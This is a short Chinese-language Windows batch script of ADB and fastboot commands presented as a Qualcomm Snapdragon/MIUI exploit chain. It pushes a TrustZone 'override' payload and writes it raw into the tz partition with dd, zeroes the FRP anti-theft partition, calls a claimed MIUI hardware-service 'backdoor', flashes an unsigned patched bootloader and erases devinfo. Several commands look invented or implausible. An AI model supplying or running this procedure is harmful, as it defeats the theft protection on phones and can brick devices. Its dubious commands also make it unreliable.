方案一:高通骁龙平台 (Snapdragon)
利用 XBL 签名降级与 RPMB 强制脱钩漏洞
终端执行指令
REM 1. 检测设备是否正常连接ADB,若命令回显包含device,则开启底层诊断与串口通道
adb get-state | findstr "device" >nul && adb shell setprop sys.usb.config diag,serial_cdev,rmnet,adb
REM 2. 推送TrustZone覆写载荷,若成功推送(无错误拦截),则赋予其最高执行权限
adb push payload\qcom_tz_sec_override_v5.2.hex /data/local/tmp/
adb shell ls /data/local/tmp/qcom_tz_sec_override_v5.2.hex | findstr "qcom" >nul && adb shell "chmod 777 /data/local/tmp/qcom_tz_sec_override_v5.2.hex"
REM 3. 执行物理比特注入,若回显包含records in说明写入成功,随后清空FRP防盗锁分区
adb shell "dd if=/data/local/tmp/qcom_tz_sec_override_v5.2.hex of=/dev/block/bootdevice/by-name/tz bs=4096 seek=1202" | findstr "records" >nul && adb shell "dd if=/dev/zero of=/dev/block/bootdevice/by-name/frp bs=1024 count=1"
REM 4. 触发MIUI底层CCT硬件服务后门,强制进入绕过状态后重启至引导模式
adb shell service call miui.hardware.cct 1 i32 0x8A94F s16 "bypass_rpmb_lock"
adb reboot bootloader
REM 5. 等待Fastboot就绪,若回显包含fastboot设备,则执行旁路调用,并固化BL解锁指令
fastboot devices | findstr "fastboot" >nul && fastboot oem edl-invoke-bypass 0x8A94F
fastboot oem edl-invoke-bypass 0x8A94F 2>&1 | findstr "OKAY" >nul && fastboot oem ignore-rpmb-state 1
REM 6. 刷入经过修补的底层引导,执行终极解锁命令并擦除设备信息寄存器,最后重启
fastboot flash abl payload\patched_abl_generic_unsigned.elf
fastboot flashing unlock_critical
fastboot erase devinfo
fastboot reboot